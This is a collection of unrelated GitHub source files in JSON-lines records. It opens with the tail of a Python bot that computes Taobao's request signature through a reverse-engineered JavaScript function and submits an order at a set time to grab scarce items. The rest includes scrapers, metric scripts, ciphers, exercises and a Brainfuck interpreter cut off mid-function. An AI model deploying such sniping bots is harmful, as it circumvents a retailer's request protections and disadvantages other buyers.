s.post(\"https://h5api.m.taobao.com/h5/mtop.trade.order.build.h5/4.0/?jsv=2.5.7&appKey=12574478&t=%s&sign=%s&api=mtop.trade.order.build.h5&v=4.0&type=originaljson&ttid=%s&isSec=1&ecode=1&AntiFlood=True&AntiCreep=True&H5Request=True&dataType=jsonp\" %\n (source_time, context.call(\"s\", token + \"&\" + source_time + \"&12574478&\" + data), \"%23t%23ip%23%23_h5_2019\"), data={\"data\": data})\n order_build_data = req.json()[\"data\"]\n break\n except Exception:\n raise\n # 抢单\n submitref = order_build_data[\"global\"][\"secretValue\"]\n # 这些参数都是根据order_build_data顺序排序的\n data = '{\"params\":\"{\\\\\"data\\\\\":\\\\\"{'\n keys = [\"itemInfo_\", \"item_\", \"invoice_\", \"promotion_\", \"deliveryMethod_\", \"anonymous_\",\n \"voucher_\", \"confirmOrder_\", \"service_yfx_\", \"ncCheckCode_\", \"memo_\", \"address_\", \"submitOrder_\"]\n for k in order_build_data[\"data\"]:\n for _k in keys:\n if _k in k:\n item = order_build_data[\"data\"][k]\n if _k == \"service_yfx_\":\n item.update(\n {\"id\": k.split(\"service_\")[1], \"tag\": \"service\"})\n else:\n item.update(\n 
{\"id\": k.split(\"_\")[1], \"tag\": k.split(\"_\")[0]})\n if _k in (\"voucher_\", \"address_\"):\n item[\"fields\"][\"cornerType\"] = \"both\"\n item_dict = json.dumps(item, ensure_ascii=False, separators=(\n ',', ':')).replace('\"', r'\\\\\\\"').replace(r'\\\\\\\\\"', r'\\\\\\\\\\\\\\\"')\n if _k in (\"address_\", ):\n item_dict = item_dict.replace(\n r'\\\\\\\\\\\\\\\\\\\"', r'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"')\n data += '\\\\\\\\\\\\\"%s\\\\\\\\\\\\\":%s,' % (k, item_dict)\n data = data[:-1] + '}\\\\\",'\n\n linkage = {\"common\": {}, \"signature\": \"\"}\n linkage[\"common\"][\"compress\"] = order_build_data[\"linkage\"][\"common\"][\"compress\"]\n linkage[\"common\"][\"submitParams\"] = order_build_data[\"linkage\"][\"common\"][\"submitParams\"]\n linkage[\"common\"][\"validateParams\"] = order_build_data[\"linkage\"][\"common\"][\"validateParams\"]\n linkage[\"signature\"] = order_build_data[\"linkage\"][\"signature\"]\n linkage_dict = json.dumps(linkage, ensure_ascii=False, separators=(\n ',', ':')).replace('\"', r'\\\\\\\"').replace(r'\\\\\\\\\"', r'\\\\\\\\\\\\\\\"')\n hierarchy_structure_dict = json.dumps(order_build_data[\"hierarchy\"][\"structure\"], ensure_ascii=False, separators=(\n ',', ':')).replace('\"', r'\\\\\\\"').replace(r'\\\\\\\\\"', r'\\\\\\\\\\\\\\\"')\n endpoint_dict = json.dumps(order_build_data[\"endpoint\"], ensure_ascii=False, separators=(\n ',', ':')).replace('\"', r'\\\\\\\"').replace(r'\\\\\\\\\"', r'\\\\\\\\\\\\\\\"')\n\n data += '\\\\\"linkage\\\\\":\\\\\"%s\\\\\",\\\\\"hierarchy\\\\\":\\\\\"{\\\\\\\\\\\\\"structure\\\\\\\\\\\\\":%s}\\\\\",\\\\\"endpoint\\\\\":\\\\\"%s\\\\\"}\"}' % (\n linkage_dict, hierarchy_structure_dict, endpoint_dict)\n\n source_time = str(int(buy_time.timestamp()) * 1000)\n sign = context.call(\"s\", token + \"&\" +\n source_time + \"&12574478&\" + data)\n while True:\n now = datetime.now()\n if now >= buy_time:\n try:\n req = s.post(\"https://h5api.m.taobao.com/h5/mtop.trade.order.create.h5/4.0/?jsv=2.5.7&appKey=12574478&t=%s&sign=%s&v=4.0&post=1&type=originaljson&timeout=15000&dataType=json&isSec=1&ecode=1&api=mtop.trade.order.create.h5&ttid=%s&H5Request=true&submitref=%s\" %\n (source_time, sign, \"%23t%23ip%23%23_h5_2019\", submitref), data={\"data\": data})\n print(\"抢单成功,请去支付\")\n break\n except Exception:\n raise\n except Exception as e:\n print(e)\n raise\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n task = asyncio.ensure_future(get_cookies())\n loop.run_until_complete(task)\n cookies = task.result()\n main(cookies)\n","repo_name":"635547251/boss","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19615150015","text":"from datetime import timedelta\n\nfrom apps.parse.readmanga.chapter import ReadmangaChapterSpider\nfrom apps.parse.readmanga.detail import ReadmangaDetailSpider\nfrom apps.parse.readmanga.images import ReadmangaImageSpider\nfrom apps.parse.readmanga.list import ReadmangaListSpider\n\nBASE_UPDATE_FREQUENCY = timedelta(hours=1)\nIMAGE_UPDATE_FREQUENCY = timedelta(hours=8)\n\nLIST_PARSER = \"list\"\nDETAIL_PARSER = \"detail\"\nCHAPTER_PARSER = \"chapters\"\nIMAGE_PARSER = \"images\"\nPARSER_TYPES = [LIST_PARSER, DETAIL_PARSER, CHAPTER_PARSER, IMAGE_PARSER]\n\nCATALOGUES = {\n \"readmanga\": {\n \"source\": \"https://readmanga.io\",\n \"settings\": \"apps.parse.readmanga.settings\",\n \"parsers\": {\n LIST_PARSER: (ReadmangaListSpider, None),\n 
DETAIL_PARSER: (ReadmangaDetailSpider, 10),\n CHAPTER_PARSER: (ReadmangaChapterSpider, 10),\n IMAGE_PARSER: (ReadmangaImageSpider, 10),\n },\n }\n}\nCATALOGUE_NAMES = [k.lower() for k in CATALOGUES.keys()]\n\nSOURCE_TO_CATALOGUE_MAP = {\n \"https://readmanga.io\": \"readmanga\",\n}\nCATALOGUE_TO_SOURCE_MAP = {v: k for k, v in SOURCE_TO_CATALOGUE_MAP.items()}\n","repo_name":"Sora-reader/backend","sub_path":"apps/parse/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"3258231037","text":"import os\nimport cv2\nimport argparse\nimport prettytable as pt\n\nimport metrics as Measure\n\n\ndef evaluator(gt_pth_lst, pred_pth_lst):\n # define measures\n FM = Measure.Fmeasure()\n WFM = Measure.WeightedFmeasure()\n SM = Measure.Smeasure()\n EM = Measure.Emeasure()\n MAE = Measure.MAE()\n\n assert len(gt_pth_lst) == len(pred_pth_lst)\n\n for idx in range(len(gt_pth_lst)):\n gt_pth = gt_pth_lst[idx]\n pred_pth = pred_pth_lst[idx]\n\n pred_pth = pred_pth[:-4] + '.png'\n if os.path.exists(pred_pth):\n pred_ary = cv2.imread(pred_pth, cv2.IMREAD_GRAYSCALE)\n else:\n pred_ary = cv2.imread(pred_pth.replace('.png', '.jpg'), cv2.IMREAD_GRAYSCALE)\n gt_ary = cv2.imread(gt_pth, cv2.IMREAD_GRAYSCALE)\n pred_ary = cv2.resize(pred_ary, (gt_ary.shape[1], gt_ary.shape[0]))\n\n FM.step(pred=pred_ary, gt=gt_ary)\n WFM.step(pred=pred_ary, gt=gt_ary)\n SM.step(pred=pred_ary, gt=gt_ary)\n EM.step(pred=pred_ary, gt=gt_ary)\n MAE.step(pred=pred_ary, gt=gt_ary)\n\n fm = FM.get_results()['fm']\n # Weighted F-measure metric published in CVPR'14 (How to evaluate the foreground maps?)\n wfm = WFM.get_results()['wfm']\n # S-meaure metric published in ICCV'17 (Structure measure: A New Way to Evaluate the Foreground Map.)\n sm = SM.get_results()['sm']\n # E-measure metric published in IJCAI'18 (Enhanced-alignment Measure for Binary Foreground Map Evaluation.)\n em = EM.get_results()['em']\n mae = MAE.get_results()['mae']\n\n return fm, wfm, sm, em, mae\n\n\ndef eval_res(opt, txt_save_path):\n # evaluation for whole dataset\n for _data_name in opt.data_lst:\n # print('#' * 20, _data_name, '#' * 20)\n filename = os.path.join(txt_save_path, '{}_eval.txt'.format(_data_name))\n with open(filename, 'a+') as file_to_write:\n tb = pt.PrettyTable()\n tb.field_names = [\n \"Dataset\", \"Method\", \"maxEm\", \"Smeasure\", \"maxFm\", \"MAE\", \"meanEm\", \"meanFm\",\n \"adpEm\", \"wFmeasure\", \"adpFm\"\n ]\n for _model_name in opt.model_lst:\n gt_src = os.path.join(opt.gt_root, _data_name)\n gt_paths = []\n for ctgr in os.listdir(gt_src):\n for f in os.listdir(os.path.join(gt_src, ctgr)):\n gt_paths.append(os.path.join(gt_src, ctgr, f).replace('\\\\', '/'))\n pred_paths = [p.replace(opt.gt_root, os.path.join(opt.pred_root, _model_name).replace('\\\\', '/')) for p in gt_paths]\n fm, wfm, sm, em, mae = evaluator(\n gt_pth_lst=gt_paths,\n pred_pth_lst=pred_paths\n )\n tb.add_row([\n _data_name, _model_name, em['curve'].max().round(3), sm.round(3), fm['curve'].max().round(3), mae.round(3), em['curve'].mean().round(3), fm['curve'].mean().round(3),\n em['adp'].round(3), wfm.round(3), fm['adp'].round(3)\n ])\n print(tb)\n file_to_write.write(str(tb))\n file_to_write.close()\n\n\nif __name__ == '__main__':\n # set parameters\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--gt_root', type=str, help='ground-truth root',\n default='/root/autodl-tmp/datasets/sod/gts')\n parser.add_argument(\n 
'--pred_root', type=str, help='prediction root',\n default='/root/autodl-tmp/datasets/sod/preds')\n parser.add_argument(\n '--data_lst', type=list, help='test dataset',\n default=['CoCA', 'CoSOD3k', 'CoSal2015'])\n parser.add_argument(\n '--model_dir', type=str, help='candidate competitors',\n default='gconet_X')\n parser.add_argument(\n '--txt_name', type=str, help='candidate competitors',\n default='exp_result')\n opt = parser.parse_args()\n if '/ep' in opt.model_dir.replace('\\\\', '/'):\n opt.model_lst = [opt.model_dir]\n else:\n opt.model_lst = sorted([os.path.join(opt.model_dir, p) for p in os.listdir(os.path.join(opt.pred_root, opt.model_dir))], key=lambda x: -int(x.split('ep')[-1]))\n\n txt_save_path = 'evaluation/eval-{}'.format(opt.txt_name)\n os.makedirs(txt_save_path, exist_ok=True)\n\n eval_res(opt, txt_save_path)\n\n","repo_name":"ZhengPeng7/MCCL","sub_path":"evaluation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"74651814827","text":"#!/usr/bin/python3\n\"\"\"defines a class based on its predecessor module: '4-square.py'\"\"\"\n\n\nclass Square:\n \"\"\"defines a square that prints the square to stdout with '#'\"\"\"\n\n def __init__(self, size=0):\n \"\"\"Constructor.\n Args:\n size(int): length of side of square\n \"\"\"\n\n self.__size = size\n\n @property\n def size(self):\n \"\"\"\n Raises:\n TypeError: if size is not type(int)\n ValueError: if size < 0\n \"\"\"\n\n return self.__size\n\n @size.setter\n def size(self, value):\n if not isinstance(value, int):\n raise TypeError(\"size must be an integer\")\n if value < 0:  # validate the incoming value, not the old size\n raise ValueError(\"size must be >= 0\")\n\n self.__size = value\n\n def area(self):\n \"\"\"return the area of the square based on the size instance attribute\"\"\"\n\n return self.__size * self.__size\n\n def my_print(self):\n \"\"\"print:\n to stdout the square with the '#' character\n empty line if size = 0\n \"\"\"\n\n if self.__size == 0:\n print()\n else:\n col = 0\n while col < self.__size:\n row = 0\n while row < self.__size:\n print(\"#\", end='')\n row += 1\n print()\n col += 1\n","repo_name":"hendrixxD/alx-higher_level_programming","sub_path":"0x06-python-classes/5-square.py","file_name":"5-square.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39983725040","text":"import numpy as np\nfrom sympy.solvers import solve\nfrom sympy import Symbol\nfrom const import func, assess_func\n\nt = Symbol('t')\n\n\ndef calculate_step(f, x, d):\n t_function = f.calc(x + t * d)\n return solve(t_function.diff(t), t)[0]\n\n\ndef fletcher_reeves_method(f, x0, epsilon1=0.1, epsilon2=0.1, M=100):\n x_list = [np.array(x0).astype(float)]\n d_list = []\n k = 0\n while k < M:\n gradient = f.gradient_value(x_list[k])\n\n if np.linalg.norm(gradient) < epsilon1:\n return x_list[k], k + 1\n\n if k != 0:\n prev_gradient = f.gradient_value(x_list[k - 1])\n beta = np.linalg.norm(gradient)**2 / np.linalg.norm(prev_gradient)**2\n d = -gradient + beta * d_list[k - 1]\n else:\n d = -gradient\n\n d_list.append(d)\n\n step = float(calculate_step(f, x_list[k], d_list[-1]))\n\n x_list.append(x_list[k] + step * d_list[k])\n\n if np.linalg.norm(x_list[k + 1] - x_list[k]) < epsilon2 \\\n and abs(f.calc(x_list[k + 1]) - f.calc(x_list[k])) < epsilon2 \\\n and len(x_list) > 2 \\\n and np.linalg.norm(x_list[k] - x_list[k - 1]) < epsilon2 \\\n and 
abs(f.calc(x_list[k]) - f.calc(x_list[k - 1])) < epsilon2:\n return x_list[k + 1], k + 1\n\n k += 1\n\n return x_list[-1], k\n\n\nif __name__ == '__main__':\n print(fletcher_reeves_method(assess_func, [-10, 10], epsilon1=0.1, epsilon2=0.1, M=100))\n","repo_name":"alekc080901/portfolio","sub_path":"5 семестр/Методы оптимизации/Методы первого порядка/fletcher_reeves.py","file_name":"fletcher_reeves.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20628319685","text":"import socket\n\ndef check_port_open(ip, port):\n tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcp_result = tcp_sock.connect_ex((ip, port))\n tcp_sock.close()\n #print(tcp_result)\n\n if tcp_result == 0:\n return True\n else:\n return False\n","repo_name":"automatethem/python-supporter","sub_path":"python_supporter/socket.py","file_name":"socket.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74613427948","text":"# Useful function for the affine cipher\n\nimport sys\nimport cryptomath\nimport random\nSYMBOLS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890 !?.'\n\n\ndef getKeyParts(key):\n keyA = key // len(SYMBOLS)\n keyB = key % len(SYMBOLS)\n return (keyA, keyB)\n\n\ndef checkKeys(keyA, keyB, mode):\n if keyA == 1 and mode == 'encrypt':\n sys.exit('Cipher is weak if key A is 1. Choose a different key.')\n if keyB == 0 and mode == 'encrypt':\n sys.exit('Cipher is weak if key B is 0. Choose a different key.')\n if keyA < 0 or keyB < 0 or keyB > len(SYMBOLS) - 1:\n sys.exit('Key A must be greater than 0 and Key B must be between 0 and %s.' % (\n len(SYMBOLS) - 1))\n if cryptomath.gcd(keyA, len(SYMBOLS)) != 1:\n sys.exit('Key A (%s) and the symbol set size (%s) are not relatively prime. Choose a different key.' 
% (\n keyA, len(SYMBOLS)))\n\n\ndef encryptMessage(key, message):\n keyA, keyB = getKeyParts(key)\n checkKeys(keyA, keyB, 'encrypt')\n ciphertext = ''\n for symbol in message:\n if symbol in SYMBOLS:\n # Encrypt the symbol:\n symbolIndex = SYMBOLS.find(symbol)\n ciphertext += SYMBOLS[(symbolIndex * keyA + keyB) % len(SYMBOLS)]\n else:\n ciphertext += symbol # Append the symbol without encrypting.\n return ciphertext\n\n\ndef decryptMessage(key, message):\n keyA, keyB = getKeyParts(key)\n checkKeys(keyA, keyB, 'decrypt')\n plaintext = ''\n modInverseOfKeyA = cryptomath.findModInverse(keyA, len(SYMBOLS))\n\n for symbol in message:\n if symbol in SYMBOLS:\n # Decrypt the symbol:\n symbolIndex = SYMBOLS.find(symbol)\n plaintext += SYMBOLS[(symbolIndex - keyB) *\n modInverseOfKeyA % len(SYMBOLS)]\n else:\n plaintext += symbol # Append the symbol without decrypting.\n return plaintext\n\n\ndef getRandomKey():\n while True:\n keyA = random.randint(2, len(SYMBOLS))\n keyB = random.randint(2, len(SYMBOLS))\n if cryptomath.gcd(keyA, len(SYMBOLS)) == 1:\n return keyA * len(SYMBOLS) + keyB\n","repo_name":"HolzerSoahita/Cracking_code_python","sub_path":"Affine/affineCipherFunction.py","file_name":"affineCipherFunction.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"29262773144","text":"# -*- coding = utf-8 -*-\n# @Time : 2021/8/24 8:28\n# @Author : 陈凡亮\n# @File : String copy.py\n# @Software : PyCharm\n\ndef main():\n s1=input()\n s2=''\n for s in s1:\n if str(s) in ['a','e','i','o','u']:\n s2+=str(s)\n print(s2)\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"2017040264/buctoj-cfl","sub_path":"2021_08_24/String copy.py","file_name":"String copy.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6384898897","text":"from karakter_tip import KarakterTip\nfrom takim import Takim\nfrom karakter import Karakter\nfrom karsilasma import Karsilasma\nsovalye = KarakterTip(\"Şovalye\", 50, 3, 100)\nokcu = KarakterTip(\"Okçu\", 20, 2, 60)\nmancinik = KarakterTip(\"Mancınık\", 100, 1, 400)\n\nsovalye1 = Karakter(\"Şovalye Ahmet\", sovalye)\nokcu1 = Karakter(\"Okçu Korhan\", okcu)\nmancinik1 = Karakter(\"Mancinik Tolga\", mancinik)\nsovalye2 = Karakter(\"Şovalye Emre\", sovalye)\nokcu2 = Karakter(\"Okçu mert\", okcu)\nmancinik2 = Karakter(\"Mancinik ahmet\", mancinik)\nokcu3 = Karakter(\"Okçu yusuf\", okcu)\nmancinik3 = Karakter(\"Mancinik kubilay\", mancinik)\n\ntakim1 = Takim([sovalye1, okcu1, mancinik1, sovalye2])\ntakim2 = Takim([okcu2, mancinik2, okcu3, mancinik3])\n\nprint(\"Takim 1 can : {}\".format(takim1.can))\nprint(\"Takim 2 can : {}\".format(takim2.can))\nKarsilasma([takim1, takim2]).savas_basla()\n","repo_name":"sandiklibilgisayarprogramlama/ntp1-2023","sub_path":"hafta 13/ornek2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4473860869","text":"a = int(input(\"Enter a rectangle dimension: \"))\nb = int(input(\"Enter b rectangle dimension: \"))\n\nfor x in range(0, a):\n for y in range(0, b):\n margin = b - 1\n if y == margin:\n print(\"*\", end=\"\\n\")\n else:\n if y > 0 and x > 0 and x < (a-1):\n print(\" \", end=\"\")\n else:\n print(\"*\", 
end=\"\")","repo_name":"JakubIwaszek/PythonHomeworks","sub_path":"03ControlStructures/e25.py","file_name":"e25.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74613866348","text":"from . import txt2str\nfrom . import bin2array\nfrom collections import namedtuple\nimport os\n\n\nProgramDef = namedtuple(\"ProgramDef\", [\"name\",\"writedata\"])\nInputType = namedtuple(\"InputType\", [\"name\", \"path\"])\nOptions = type(\"Options\", (object,),\n dict((name,None) for name in\n [\"declare\", \"pretty\", \"defprefix\", \"op_eq\",\n \"op_concat\", \"endstatement\", \"varcomment\",\n \"headerext\", \"sourceext\", \"noheader\",\n \"headerstart\", \"headerend\",\n \"sourcestart\", \"sourceend\", \"forcenoheader\"]))\n\nprograms = [\n ProgramDef(\"txt2str\", txt2str.writedata),\n ProgramDef(\"bin2array\", bin2array.writedata),\n]\n\ndef name2var(name):\n return name.replace(\".\", \"_\")\n\ndef execute_program(program, outputdir, outputname, inputs, options):\n if options.forcenoheader:\n options.noheader = True\n if options.noheader:\n hout = None\n sout = open(\"{}/{}\".format(outputdir, outputname), \"w\")\n else:\n hout = open(\"{}/{}\".format(outputdir, outputname) + options.headerext, \"w\")\n sout = open(\"{}/{}\".format(outputdir, outputname) + options.sourceext, \"w\")\n output_varname = name2var(outputname)\n odict = { \"uppername\": output_varname.upper(), \"varname\": output_varname,\n \"name\": outputname }\n if not options.noheader:\n hout.write(options.headerend.format(**odict))\n sout.write(options.sourceend.format(**odict))\n\n for inp in inputs:\n name = inp.name\n path = inp.path\n varname= name2var(name)\n pnewline = \"\\n\" if options.pretty else \"\"\n fsize = os.stat(path).st_size\n fdict = {\"path\":path, \"varname\":varname, \"filesize\": fsize, \"name\": name,\n \"filesize_p1\":fsize + 1 }\n infile = open(path, \"r\")\n if hout != None:\n hout.write(options.declare.format(**fdict) + pnewline)\n sout.write(options.defprefix.format(**fdict) + options.op_eq + pnewline)\n program.writedata(infile, sout, options)\n sout.write(options.endstatement + \\\n options.varcomment.format(**fdict) + pnewline)\n\n if not options.noheader:\n hout.write(options.headerend.format(**odict))\n hout.close()\n\n sout.write(options.sourceend.format(**odict)) \n sout.close()\n","repo_name":"hosseinzoda/file2var","sub_path":"libfile2var/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36465156775","text":"#\n# * Intro 14. Alternating Sums\n# * Easy\n\n# * Several people are standing in a row and need to be divided into two teams. \n# * The first person goes into team 1, the second goes into team 2, the third goes \n# * into team 1 again, the fourth into team 2, and so on.\n\n# You are given an array of positive integers - the weights of the people. 
\n# Return an array of two integers, where the first element is the total weight \n# of team 1, and the second element is the total weight of team 2 after the \n# division is complete.\n\n# * Example\n\n# For a = [50, 60, 60, 45, 70], the output should be\n# alternatingSums(a) = [180, 105].\n\n# * Input/Output\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] array.integer a\n\n# Guaranteed constraints:\n# 1 ≤ a.length ≤ 105,\n# 45 ≤ a[i] ≤ 100.\n\n# [output] array.integer\n\n#%%\n\n# * Solution 1\ndef alternatingSum(a: list) -> list:\n # ! get odd index elements and even index elements\n w1 = sum(a[::2])\n w2 = sum(a[1::2])\n return [w1, w2]\n\n\n# * Solution 2\ndef alternatingSum1(a: list) -> list:\n result = [0,0]\n for i, x in enumerate(a):\n result[i%2] += x\n \n return result\n\n\na1 = [50, 60, 60, 45, 70]\nr1 = alternatingSum1(a1)\nprint('For {}, expected: {}, result: {}'.format(a1, [180, 105], r1))\n\n#%%","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Intro/Intro14AlternatingSums.py","file_name":"Intro14AlternatingSums.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8615159065","text":"class StoreMashines:\n\n def __init__(self, name, price, quantity, number_of_lists):\n self.name = name\n self.price = price\n self.quantity = quantity\n self.numb = number_of_lists\n self.my_store_full = []\n self.my_store = []\n self.my_unit = {'device model': self.name, 'price per unit': self.price, 'quantity': self.quantity}\n def __str__(self):\n return f'{self.name} price {self.price} quantity {self.quantity}'\n\n def reception(self):\n try:\n unit = input(f'enter product ')\n unit_p = int(input(f'enter price per unit '))\n unit_q = int(input(f'enter the product quantity '))\n unique = {'device model': unit, 'price per unit': unit_p, 'quantity': unit_q}\n self.my_unit.update(unique)\n self.my_store.append(self.my_unit)\n print(f'current list -\\n {self.my_store}')\n except:\n return f'error'\n\n print(f'exit - Q, continue - Enter')\n q = input(f'---> ')\n if q == 'Q' or q == 'q':\n self.my_store_full.append(self.my_store)\n print(f'entire list -\\n {self.my_store_full}')\n return f'exit'\n else:\n return StoreMashines.reception(self)\nclass Printer(StoreMashines):\n def to_print(self):\n return f' print {self.numb} times'\n\nclass Scanner(StoreMashines):\n def to_scan(self):\n return f' scan {self.numb} times'\n\nclass Copier(StoreMashines):\n def to_copier(self):\n return f' copier {self.numb} times'\n\nunit_1 = Printer('hp', 5700, 4, 8)\nunit_2 = Scanner('kyocera', 19000, 1, 12)\nunit_3 = Copier('Xerox', 1300.4, 3, 4)\nprint(unit_1.reception())\nprint(unit_2.reception())\nprint(unit_3.reception())\nprint(unit_1.to_print())\nprint(unit_3.to_copier())","repo_name":"AlenaGB/8hw","sub_path":"4_6.py","file_name":"4_6.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26512035564","text":"\"\"\"\nCommon utility functions.\n\"\"\"\n\ndef normalize_name(name : str) -> str:\n \"\"\"\n Normalize player names by removing punctuation and suffixes.\n \"\"\"\n replace_strings = [\"Sr.\", \"Jr.\", \"III\", \"IV\", \"II\", \".\", \",\"]\n name = name.strip()\n for rep in replace_strings:\n name = name.replace(rep, \"\")\n return name.strip()\n\ndef normalize_owner(name : str) -> str:\n \"\"\"\n Standardize the owner name.\n \"\"\"\n pairs = {\n \"Simon Thomas\": \"STDK\",\n 
\"Jared Duffy\": \"JDBK\"\n }\n if name in pairs:\n return pairs.get(name, \"\")\n return name.split(\" \")[0].capitalize()\n","repo_name":"AdmaJonse/ff-scraper","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22444887445","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse, JsonResponse\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom rest_framework.parsers import JSONParser\r\nfrom app1.models import StudentInfo\r\nfrom app1.serializers import StudentInfoSerializer\r\nfrom rest_framework import status\r\nfrom rest_framework.decorators import api_view\r\nfrom rest_framework.response import Response\r\n# Create your views here.\r\n\r\n@api_view(['GET','POST'])\r\ndef studentInfo_list(request):\r\n \"\"\"\r\n List all code StudentInfo, or create a new StudentInfo.\r\n \"\"\"\r\n if request.method == 'GET':\r\n studentlist = StudentInfo.objects.all()\r\n serializer = StudentInfoSerializer(studentlist, many=True)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'POST':\r\n serializer = StudentInfoSerializer(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n@api_view(['GET', 'PUT', 'DELETE'])\r\ndef studentInfo_detail(request, pk):\r\n \"\"\"\r\n Retrieve, update or delete a code snippet.\r\n \"\"\"\r\n try:\r\n studentinfo = StudentInfo.objects.get(pk=pk)\r\n except StudentInfo.DoesNotExist:\r\n return HttpResponse(status=status.HTTP_404_NOT_FOUND)\r\n\r\n if request.method == 'GET':\r\n serializer = StudentInfoSerializer(studentinfo)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'PUT':\r\n serializer = StudentInfoSerializer(studentinfo, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n elif request.method == 'DELETE':\r\n studentinfo.delete()\r\n return HttpResponse(status=status.HTTP_204_NO_CONTENT)\r\n","repo_name":"avanishmaurya/helloeveryone","sub_path":"restapi/app1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8693419236","text":"import sys\n\nTAPE = [0]\nTAPE_LEN = 1\nTAPE_POINTER = 0\n\nINPUT_STREAM = \"\"\n\nCODE = \"\"\nCODE_POINTER = 0\n\nOPCODES = { '+': lambda: plus(),\n '-': lambda: minus(),\n '<': lambda: less(),\n '>': lambda: greater(),\n '[': lambda: openSquare(),\n ']': lambda: closedSquare(),\n '.': lambda: dot(),\n ',': lambda: comma(),\n '@': lambda: at()\n }\n\n# >\ndef greater():\n global TAPE, TAPE_LEN, TAPE_POINTER\n TAPE_POINTER += 1\n if TAPE_POINTER == TAPE_LEN:\n TAPE.append(0)\n TAPE_LEN += 1\n\n# <\ndef less():\n global TAPE, TAPE_LEN, TAPE_POINTER\n TAPE_POINTER -= 1\n if TAPE_POINTER == -1:\n TAPE = [0] + TAPE\n TAPE_LEN += 1\n TAPE_POINTER = 0\n\n# +\ndef plus():\n global TAPE, TAPE_LEN, TAPE_POINTER\n TAPE[TAPE_POINTER] += 1\n TAPE[TAPE_POINTER] %= 256\n\n# -\ndef minus():\n global TAPE, TAPE_LEN, TAPE_POINTER\n TAPE[TAPE_POINTER] -= 1\n TAPE[TAPE_POINTER] %= 256\n\n# .\ndef dot():\n global TAPE, TAPE_LEN, TAPE_POINTER\n print(chr(TAPE[TAPE_POINTER]), end='')\n\n# ,\ndef 
comma():\n global TAPE, TAPE_LEN, TAPE_POINTER, INPUT_STREAM\n while len(INPUT_STREAM) == 0:\n INPUT_STREAM = input()\n TAPE[TAPE_POINTER] = ord(INPUT_STREAM[0])\n if len(INPUT_STREAM) == 1:\n INPUT_STREAM = \"\"\n else:\n INPUT_STREAM = INPUT_STREAM[1:]\n\n# [\ndef openSquare():\n global TAPE, TAPE_LEN, TAPE_POINTER, CODE, CODE_POINTER\n if TAPE[TAPE_POINTER] == 0:\n openBrackets = 1\n while openBrackets:\n CODE_POINTER += 1\n if CODE[CODE_POINTER] == '[':\n openBrackets += 1\n elif CODE[CODE_POINTER] == ']':\n openBrackets -= 1\n\n# ]\ndef closedSquare():\n global TAPE, TAPE_LEN, TAPE_POINTER, CODE, CODE_POINTER\n if TAPE[TAPE_POINTER] != 0:\n closedBrackets = 1\n while closedBrackets:\n CODE_POINTER -= 1\n if CODE[CODE_POINTER] == ']':\n closedBrackets += 1\n elif CODE[CODE_POINTER] == '[':\n closedBrackets -= 1\n\n# @\ndef at():\n global TAPE, TAPE_LEN, TAPE_POINTER, CODE, CODE_POINTER\n assert CODE_POINTER != 0\n print()\n print(\"DEBUG - Memory dump\")\n print(\"Breakpoint after instruction {0} {1}\".format(CODE_POINTER-1, CODE[CODE_POINTER-1]))\n print(\"Index\\tValue\\tPointer\")\n for i in 